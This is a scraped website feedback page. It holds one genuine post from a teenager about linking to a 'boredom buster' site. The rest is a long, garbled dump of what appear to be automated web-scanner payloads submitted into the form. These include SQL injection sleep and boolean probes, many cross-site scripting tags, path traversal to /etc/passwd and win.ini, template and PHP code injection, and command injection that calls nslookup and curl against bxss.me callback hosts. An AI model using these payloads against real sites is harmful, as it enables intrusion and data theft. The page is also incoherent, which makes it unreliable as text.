Feedback
Submit suggestionI am using this on my site by Idrees - 157 months ago
Hello! You guys have created such a great boredom buster that i have put it on my site! It is really just a link but i claim that you guys made it. Because i couldnt use the words kick ass because it is for teens and parents might get annoyed, i said that Erik Rothoff made it. Is this a problem because if it is then just email me at idrees@idreesinc.com! Thanks for the great invention!
Website: IdreesInc.com
BTW i am 14 so thats why i couldnt use the words kick ass
4542700395844717
yes you can destroy websltesJJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
1DdNgS54DGO1CztN5m0lEO
1WfxYANoW
${10000430+10000442}${9999577+9999888}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpgAnonymous
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
/etc/shellsWfxYANoW
file:///etc/passwdWfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
1WfxYANoW
../1WfxYANoW
c:/windows/win.iniWfxYANoW
response.write(9146680*9874120)WfxYANoW
bxss.meWfxYANoW
echo nftett$()\ gnjezi\nz^xyu||a #' &echo nftett$()\ gnjezi\nz^xyu||a #|" &echo nftett$()\ gnjezi\nz^xyu||a #WfxYANoW
'+response.write(9146680*9874120)+'WfxYANoW
&echo zuztwj$()\ iotemu\nz^xyu||a #' &echo zuztwj$()\ iotemu\nz^xyu||a #|" &echo zuztwj$()\ iotemu\nz^xyu||a #WfxYANoW
"+response.write(9146680*9874120)+"WfxYANoW
1&echo fjjxqi$()\ xavjvi\nz^xyu||a #' &echo fjjxqi$()\ xavjvi\nz^xyu||a #|" &echo fjjxqi$()\ xavjvi\nz^xyu||a #file:///etc/passwd
1WfxYANoW
|echo nstljb$()\ lejcup\nz^xyu||a #' |echo nstljb$()\ lejcup\nz^xyu||a #|" |echo nstljb$()\ lejcup\nz^xyu||a #response.write(9228681*9272676)
1WfxYANoW
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1WfxYANoW
1|echo fxhrqi$()\ enqaax\nz^xyu||a #' |echo fxhrqi$()\ enqaax\nz^xyu||a #|" |echo fxhrqi$()\ enqaax\nz^xyu||a #Http://bxss.me/t/fit.txt
1../WfxYANoW
1http://bxss.me/t/fit.txt?.jpg
1'+response.write(9228681*9272676)+'
1/etc/shells
1WfxYANoW
(nslookup -q=cname hitjariztubme44f40.bxss.me||curl hitjariztubme44f40.bxss.me))WfxYANoW
YcgSrMjgWfxYANoW
EbYqaQta: 5KrrgOJR"+response.write(9228681*9272676)+"
1c:/windows/win.ini
1t7nfeVWT
1WfxYANoW
1&n912772=v919651bxss.me
13IfrHJQb: 5UEuEbso
1WfxYANoW
)Z3o5SkxuQjI=
1WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
$(nslookup -q=cname hitwclxtcngbwaeaf6.bxss.me||curl hitwclxtcngbwaeaf6.bxss.me)WfxYANoW
';print(md5(31337));$a='WfxYANoW
&nslookup -q=cname hitjkskiilbjzeb2c0.bxss.me&'\"`0&nslookup -q=cname hitjkskiilbjzeb2c0.bxss.me&`'WfxYANoW
'.gethostbyname(lc('hitwr'.'rozpfrxl9cb6a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(68).chr(109).chr(74).'WfxYANoW
!(()&&!|*|*|WfxYANoW
";print(md5(31337));$a="WfxYANoW
^(#$!@#$)(()))******WfxYANoW
1)
1WfxYANoW&n922979=v983487
1WfxYANoW
&(nslookup -q=cname hitnyxmfnhocr70cca.bxss.me||curl hitnyxmfnhocr70cca.bxss.me)&'\"`0&(nslookup -q=cname hitnyxmfnhocr70cca.bxss.me||curl hitnyxmfnhocr70cca.bxss.me)&`'!(()&&!|*|*|
1WfxYANoW
".gethostbyname(lc("hitze"."gpacyufp645a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(68).chr(102).chr(88)."WfxYANoW
${@print(md5(31337))}WfxYANoW
'"()WfxYANoW
gethostbyname(lc('hitvw'.'wwetnpat8437e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(65).chr(122).chr(68)^(#$!@#$)(()))******
1WfxYANoW
1'&&sleep(27*1000)*rewpti&&'WfxYANoW
|(nslookup -q=cname hitzkglulcyifcf43b.bxss.me||curl hitzkglulcyifcf43b.bxss.me)WfxYANoW
${@print(md5(31337))}\WfxYANoW
'"WfxYANoW
<!--WfxYANoW
'.print(md5(31337)).'WfxYANoW
1"&&sleep(27*1000)*fxysys&&"'"
1<!--
1WfxYANoW
1'||sleep(27*1000)*ypxall||'WfxYANoW
`(nslookup -q=cname hitamhireoiba94110.bxss.me||curl hitamhireoiba94110.bxss.me)`';print(md5(31337));$a='
1WfxYANoW
xfs.bxss.meWfxYANoW
1"||sleep(27*1000)*jwwngi||"WfxYANoW
1'"()&%<zzz><ScRiPt >rALv(9984)</ScRiPt>";print(md5(31337));$a="
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(99).concat(78).concat(113).concat(70)+(require"socket" Socket.gethostbyname("hitel"+"sarfarli468c3.bxss.me.")[3].to_s)+"${@print(md5(31337))}
1xfs.bxss.me
1WfxYANoW
;(nslookup -q=cname hitwmnrntuppm73e0a.bxss.me||curl hitwmnrntuppm73e0a.bxss.me)|(nslookup -q=cname hitwmnrntuppm73e0a.bxss.me||curl hitwmnrntuppm73e0a.bxss.me)&(nslookup -q=cname hitwmnrntuppm73e0a.bxss.me||curl hitwmnrntuppm73e0a.bxss.me)WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
'"()&%<zzz><ScRiPt >rALv(9636)</ScRiPt>${@print(md5(31337))}\
1HttP://bxss.me/t/xss.html?%00
1WfxYANoW
commentWfxYANoW
commentWfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(107).concat(73).concat(107).concat(90)+(require'socket' Socket.gethostbyname('hitfc'+'leyugkqe71fcd.bxss.me.')[3].to_s)+''.print(md5(31337)).'
1WfxYANoW
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(101).concat(78)+(require'socket' Socket.gethostbyname('hitck'+'vqyuuaeg3c41c.bxss.me.')[3].to_s)bxss.me/t/xss.html?%00
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitguciqgypve87269.bxss.me||curl${IFS}hitguciqgypve87269.bxss.me)WfxYANoW
1WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitecnafyqcti4711a.bxss.me||curl${IFS}hitecnafyqcti4711a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitecnafyqcti4711a.bxss.me||curl${IFS}hitecnafyqcti4711a.bxss.me)&`'WfxYANoW
comment/.WfxYANoW
19688401comment
1comment
1'"()
1WfxYANoW
bfg6135<s1﹥s2ʺs3ʹhjl6135comment/.
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW'&&sleep(27*1000)*ynedkv&&'
1WfxYANoW"&&sleep(27*1000)*hiznbj&&"
1WfxYANoW
<th:t="${dfb}#foreachWfxYANoW'||sleep(27*1000)*lrmjxm||'
1WfxYANoW"||sleep(27*1000)*blndgx||"
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >rALv(9165)</ScRiPt>WfxYANoW
1<W1DHEJ>X0UGI[!+!]</W1DHEJ>WfxYANoW
1WfxYANoW
1<script>rALv(9650)</script>WfxYANoW
1<script>rALv(9723)</script>9723WfxYANoW
1<ScR<ScRiPt>IpT>rALv(9057)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >rALv(9045)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9781></ScRiPt>WfxYANoW
1<ScRiPt >rALv(9218)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=rALv(9192)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9943'>WfxYANoW
1<body onload=rALv(9637)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=rALv(9217)>WfxYANoW
1wBkaYdJmWfxYANoW
1<img src=xyz OnErRor=rALv(9514)>WfxYANoW
1<img/src=">" onerror=alert(9137)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%72%41%4C%76%289840%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\rALv(9292)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>rALv(9505)</sCripT>WfxYANoW
1<input autofocus onfocus=rALv(9675)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(rALv(9182))}WfxYANoW
1NQYJf <ScRiPt >rALv(9652)</ScRiPt>WfxYANoW
1<WSK7OR>F5BKN[!+!]</WSK7OR>WfxYANoW
1<ifRAme sRc=9724.com></IfRamE>WfxYANoW
1WfxYANoW
-1 OR 2+989-989-1=0+0+0+1 --WfxYANoW
-1 OR 2+594-594-1=0+0+0+1WfxYANoW
-1' OR 2+558-558-1=0+0+0+1 --WfxYANoW
-1' OR 2+122-122-1=0+0+0+1 or 'uXdHqhYE'='WfxYANoW
1<adB56CY x=9930>WfxYANoW
-1" OR 2+149-149-1=0+0+0+1 --WfxYANoW
1<img sRc='http://attacker-9528/log.php?WfxYANoW
1<aoUmkjK<WfxYANoW'"()&%<zzz><ScRiPt >rALv(9449)</ScRiPt>
1'"()&%<zzz><ScRiPt >rALv(9333)</ScRiPt>
1WfxYANoW9805182
1bfg8451<s1﹥s2ʺs3ʹhjl8451
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<ScRiPt >rALv(9164)</ScRiPt>
1WfxYANoW<WUGGQ4>NZLI4[!+!]</WUGGQ4>
1WfxYANoW<script>rALv(9630)</script>
1WfxYANoW<script>rALv(9832)</script>9832
1WfxYANoW<ScRiPt >rALv(9111)</ScRiPt>
1WfxYANoW<ScRiPt >rALv(9874)</ScRiPt>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<body onload=rALv(9007)>
1WfxYANoW<img src=xyz OnErRor=rALv(9102)>
1WfxYANoW<img/src=">" onerror=alert(9487)>
1WfxYANoW\u003CScRiPt\rALv(9866)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>rALv(9927)</sCripT>
1WfxYANoW<input autofocus onfocus=rALv(9949)>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(rALv(9961))}
1WfxYANoWWmwvu <ScRiPt >rALv(9162)</ScRiPt>
1WfxYANoW<WFRC7M>RCMWA[!+!]</WFRC7M>
1WfxYANoW<ifRAme sRc=9775.com></IfRamE>
1WfxYANoW<aq0Zwf9 x=9616>
1WfxYANoW<img sRc='http://attacker-9292/log.php?
1WfxYANoW<anp66oI<
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1Cz68Ovv3'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 530=(SELECT 530 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 584=(SELECT 584 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 734=(SELECT 734 FROM PG_SLEEP(15))--WfxYANoW
1va0ns3YQ' OR 530=(SELECT 530 FROM PG_SLEEP(15))--WfxYANoW
1hAbVSS5Y') OR 879=(SELECT 879 FROM PG_SLEEP(15))--WfxYANoW
13rNAI5Ud')) OR 157=(SELECT 157 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@VThnvWfxYANoW
1WfxYANoW
1WfxYANoWxUhXPyLN
1WfxYANoW
1-1 OR 2+360-360-1=0+0+0+1 --
1-1 OR 2+397-397-1=0+0+0+1
1-1' OR 2+392-392-1=0+0+0+1 --
1-1' OR 2+716-716-1=0+0+0+1 or '7RVIAAWf'='
1-1" OR 2+336-336-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWgncT07cz'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@QMdva
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comkwkowiih
1jvdxxsgh
response.write(9448329*9477545)jvdxxsgh
'+response.write(9448329*9477545)+'pbbisdfc
1jvdxxsgh
"+response.write(9448329*9477545)+"pbbisdfc
1ynswwfvj
set|set&setresponse.write(9645638*9993587)
1pbbisdfc
eRPNHMYmynswwfvj
$(nslookup zlvlNvtP)'+response.write(9645638*9993587)+'
1pbbisdfc
-1 OR 2+17-17-1=0+0+0+1 --ynswwfvj
&nslookup 96aiZhnR&'\"`0&nslookup 96aiZhnR&`'"+response.write(9645638*9993587)+"
1pbbisdfc
-1 OR 2+143-143-1=0+0+0+1set|set&set
1fedoqpwi
mJwRTgkReqpfebfp
../../../../../../../../../../etc/passwdpbbisdfc
-1' OR 2+326-326-1=0+0+0+1 --$(nslookup hpBHX6AI)
1MBlHBQXX
1eqpfebfp
../../../../../../../../../../../../../../../proc/versionpbbisdfc
-1' OR 2+261-261-1=0+0+0+1 or 'ZypgwAg2'='&nslookup cGO53RxF&'\"`0&nslookup cGO53RxF&`'
1veaaxlgk
1ylsfvhyv
${10000279+9999081}eqpfebfp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgpbbisdfc
-1" OR 2+149-149-1=0+0+0+1 --iiqqildd
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg${9999480+9999553}
1eqpfebfp
../../../../../../../../../../etc/passwd.jpgpbbisdfc
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/iiqqildd
1some_inexistent_file_with_long_name.jpgS3F0dEo5bWo=
1wmmknjva
1&n940578=v920728eqpfebfp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgpbbisdfc
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/iiqqildd
Http://testasp.vulnweb.com/t/fit.txtvnxiwghk
)eqpfebfp
/../..//../..//../..//../..//../..//etc/passwd.jpgpbbisdfc
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/iiqqildd
http://testasp.vulnweb.com/t/fit.txt?.jpgveaaxlgk
1vnxiwghk
!(()&&!|*|*|gwkhbkxl&n945358=v968941
1eqpfebfp
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdpbbisdfc
-1; waitfor delay '0:0:7' --iiqqildd
testasp.vulnweb.comAnonymous
1vnxiwghk
^(#$!@#$)(()))******eqpfebfp
/etc/passwdpbbisdfc
-1); waitfor delay '0:0:7' --)
1eqpfebfp
%2fetc%2fpasswdpbbisdfc
1 waitfor delay '0:0:7' --!(()&&!|*|*|
1fadvemcy
'"()eqpfebfp
/.././.././.././.././.././.././.././../etc/./passwd%001some_inexistent_file_with_long_name.jpg
1pbbisdfc
ax0EJ16M'; waitfor delay '0:0:10' --xesjyyim
;print(md5(acunetix_wvs_security_test));^(#$!@#$)(()))******
1eqpfebfp
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdHttp://testasp.vulnweb.com/t/fit.txt
1pbbisdfc
-1;select pg_sleep(10); --xesjyyim
';print(md5(acunetix_wvs_security_test));$a='ciaboany
http://testasp.vulnweb.com/t/xss.html?%00.jpg'"()
1eqpfebfp
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdhttp://testasp.vulnweb.com/t/fit.txt?.jpg
1pbbisdfc
-1);select pg_sleep(10); --pawuphvv
1xesjyyim
";print(md5(acunetix_wvs_security_test));$a="http://testasp.vulnweb.com/t/xss.html?%00.jpg
1ffnmxpua
http://hit9HWACIhBnn.bxss.me/testasp.vulnweb.com
1pbbisdfc
-1));select pg_sleep(3); --pawuphvv
commentxesjyyim
${@print(md5(acunetix_wvs_security_test))}rthrrqai
1eqpfebfp
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.http://hitsVW08SfASO.bxss.me/
1vxoljncd
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))pbbisdfc
-1));select pg_sleep(0); --pawuphvv
commentxesjyyim
${@print(md5(acunetix_wvs_security_test))}\rthrrqai
1'"eqpfebfp
file:///etc/passwdfempvlta
/www.vulnweb.compbbisdfc
3JNnDNQf';select pg_sleep(3); --pawuphvv
comment/.;print(md5(acunetix_wvs_security_test));
1rthrrqai
\eqpfebfp
/\../\../\../\../\../\../\../etc/passwd/www.vulnweb.com
1dgyijcsn
'"pbbisdfc
KHBGa7hU';select pg_sleep(0); --pawuphvv
1';print(md5(acunetix_wvs_security_test));$a='
1eqpfebfp
WEB-INF/web.xmlpspjngeh
1'"()&%<acx><ScRiPt >pMHi(9601)</ScRiPt>dgyijcsn
<!--pbbisdfc
zmgC2FBG');select pg_sleep(3); --comment
1";print(md5(acunetix_wvs_security_test));$a="
1rthrrqai
@@HNSnLeqpfebfp
/WEB-INF/web.xml'"
1pbbisdfc
rIAgfnoM');select pg_sleep(7); --comment
1${@print(md5(acunetix_wvs_security_test))}
1rthrrqai
JyI=eqpfebfp
WEB-INF\web.xmlpspjngeh
'"()&%<acx><ScRiPt >pMHi(9951)</ScRiPt><!--
1pbbisdfc
6XBViEx8'));select pg_sleep(3); --comment/.
1${@print(md5(acunetix_wvs_security_test))}\
1../../../../../../../../../../etc/passwd
1pbbisdfc
9GXLZpyG'));select pg_sleep(10); --pspjngeh
1_9946pbbisdfc
1rthrrqai
(select convert(int,CHAR(65)))pbbisdfc
1rthrrqai
1pspjngeh
acu4950<s1﹥s2ʺs3ʹuca4950../../../../../../../../../../etc/passwd.jpg
1EEVVFv6t
11'"
1-1 OR 2+353-353-1=0+0+0+1 --
1\
1-1 OR 2+303-303-1=0+0+0+1
1-1' OR 2+38-38-1=0+0+0+1 --
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1@@3asn8
1pspjngeh
{{9999833*10000047}}-1' OR 2+208-208-1=0+0+0+1 or '7h00Zn35'='
1/etc/passwd
1JyI=
1-1" OR 2+781-781-1=0+0+0+1 --
1%2fetc%2fpasswd
1pspjngeh
1<ScRiPt >pMHi(9208)</ScRiPt>(select convert(int,CHAR(65)))
11 waitfor delay '0:0:4' --
1pspjngeh
1<WCPYKD>GZERU[!+!]</WCPYKD>mD8xsuZL'; waitfor delay '0:0:4' --
1wav4CbXo';select pg_sleep(4); --
1ajXCNDRA');select pg_sleep(9); --
1pspjngeh
1<script>pMHi(9584)</script>Q0OGoGhz'));select pg_sleep(9); --
1file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1pspjngeh
1<ScR<ScRiPt>IpT>pMHi(9449)</sCr<ScRiPt>IpT>WEB-INF/web.xml
1/WEB-INF/web.xml
1pspjngeh
1<ScRiPt >pMHi(9653)</ScRiPt>WEB-INF\web.xml
1pspjngeh
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9003></ScRiPt>pspjngeh
1<ScRiPt >pMHi(9215)</ScRiPt>pspjngeh
1<video><source onerror="javascript:pMHi(9707)">pspjngeh
1<isindex type=image src=1 onerror=pMHi(9129)>pspjngeh
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9140'>pspjngeh
1<body onload=pMHi(9271)>pspjngeh
1<img src=//testasp.vulnweb.com/t/dot.gif onload=pMHi(9925)>pspjngeh
1<img src=xyz OnErRor=pMHi(9926)>pspjngeh
1<img/src=">" onerror=alert(9070)>pspjngeh
%31%3C%53%63%52%69%50%74%20%3E%70%4D%48%69%289072%29%3C%2F%73%43%72%69%70%54%3Epspjngeh
1\u003CScRiPt\pMHi(9974)\u003C/sCripT\u003Epspjngeh
1<ScRiPt>pMHi(9193)</sCripT>pspjngeh
1<input autofocus onfocus=pMHi(9571)>pspjngeh
<a HrEF=http://www.vulnweb.com></a>pspjngeh
<a HrEF=jaVaScRiPT:>pspjngeh
[url=http://www.vulnweb.com][/url]pspjngeh
1<img<!-- --> src=x onerror=alert(9721);//><!-- -->pspjngeh
1}body{acu:Expre/**/SSion(pMHi(9053))}pspjngeh
1<% contenteditable onresize=pMHi(9972)>pspjngeh
1_sNiyV <ScRiPt >pMHi(9700)</ScRiPt>pspjngeh
1<WXIG6N>CPRPC[!+!]</WXIG6N>pspjngeh
1<ifRAme sRc=9448.com></IfRamE>pspjngeh
1<6bIaGe x=9447>pspjngeh
1<img sRc='http://attacker-9598/log.php?pspjngeh'"()&%<acx><ScRiPt >pMHi(9626)</ScRiPt>
1'"()&%<acx><ScRiPt >pMHi(9997)</ScRiPt>
1pspjngeh_9540
1acu10372<s1﹥s2ʺs3ʹuca10372
1{{10000431*9999681}}
1pspjngeh<ScRiPt >pMHi(9919)</ScRiPt>
1pspjngeh<W4TOE9>QN5HT[!+!]</W4TOE9>
1pspjngeh<script>pMHi(9531)</script>
1pspjngeh<ScRiPt >pMHi(9938)</ScRiPt>
1pspjngeh<ScRiPt >pMHi(9195)</ScRiPt>
1pspjngeh<body onload=pMHi(9329)>
1pspjngeh<img src=xyz OnErRor=pMHi(9650)>
1pspjngeh<img/src=">" onerror=alert(9756)>
1pspjngeh\u003CScRiPt\pMHi(9529)\u003C/sCripT\u003E
1pspjngeh<ScRiPt>pMHi(9271)</sCripT>
1pspjngeh<input autofocus onfocus=pMHi(9601)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1pspjngeh}body{acu:Expre/**/SSion(pMHi(9124))}
1pspjngeh<% contenteditable onresize=pMHi(9279)>
1pspjngeh_tUD0p <ScRiPt >pMHi(9616)</ScRiPt>
1pspjngeh<WEGKOH>I9RAA[!+!]</WEGKOH>
1pspjngeh<ifRAme sRc=9815.com></IfRamE>
1pspjngeh<y4PsHo x=9644>
1pspjngeh<img sRc='http://attacker-9120/log.php?
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1gYwALfhzdwUQQUrL
1dwUQQUrL
-1 OR 2+75-75-1=0+0+0+1 --dwUQQUrL
-1 OR 2+800-800-1=0+0+0+1dwUQQUrL
-1' OR 2+668-668-1=0+0+0+1 --dwUQQUrL
-1' OR 2+306-306-1=0+0+0+1 or 'Y4kis6Jg'='dwUQQUrL
-1" OR 2+515-515-1=0+0+0+1 --dwUQQUrL
1*if(now()=sysdate(),sleep(15),0)dwUQQUrL
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZdwUQQUrL
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZdwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/dwUQQUrL
1-1; waitfor delay '0:0:15' --dwUQQUrL
1-1); waitfor delay '0:0:15' --dwUQQUrL
1-1 waitfor delay '0:0:15' --dwUQQUrL
1A1S2h5lJ'; waitfor delay '0:0:15' --dwUQQUrL
1-1 OR 476=(SELECT 476 FROM PG_SLEEP(15))--dwUQQUrL
1-1) OR 862=(SELECT 862 FROM PG_SLEEP(15))--dwUQQUrL
1-1)) OR 687=(SELECT 687 FROM PG_SLEEP(15))--dwUQQUrL
1PIgtXIEJ' OR 860=(SELECT 860 FROM PG_SLEEP(15))--dwUQQUrL
1vHAIxBPS') OR 664=(SELECT 664 FROM PG_SLEEP(15))--dwUQQUrL
1B5nbXzP9')) OR 785=(SELECT 785 FROM PG_SLEEP(15))--dwUQQUrL
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)dwUQQUrL
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'dwUQQUrL
1dwUQQUrL
1'"dwUQQUrL
@@FKuBBdwUQQUrL
1dwUQQUrL
1dwUQQUrLXPuf5UkY
1dwUQQUrL
1-1 OR 2+480-480-1=0+0+0+1 --
1-1 OR 2+695-695-1=0+0+0+1
1-1' OR 2+247-247-1=0+0+0+1 --
1-1' OR 2+53-53-1=0+0+0+1 or 'yd7Tt5mC'='
1-1" OR 2+696-696-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1dwUQQUrL-1 waitfor delay '0:0:15' --
1dwUQQUrLZqSdFvkv'; waitfor delay '0:0:15' --
1dwUQQUrL
1dwUQQUrL'"
1@@lXJnO
1dwUQQUrL
1Comment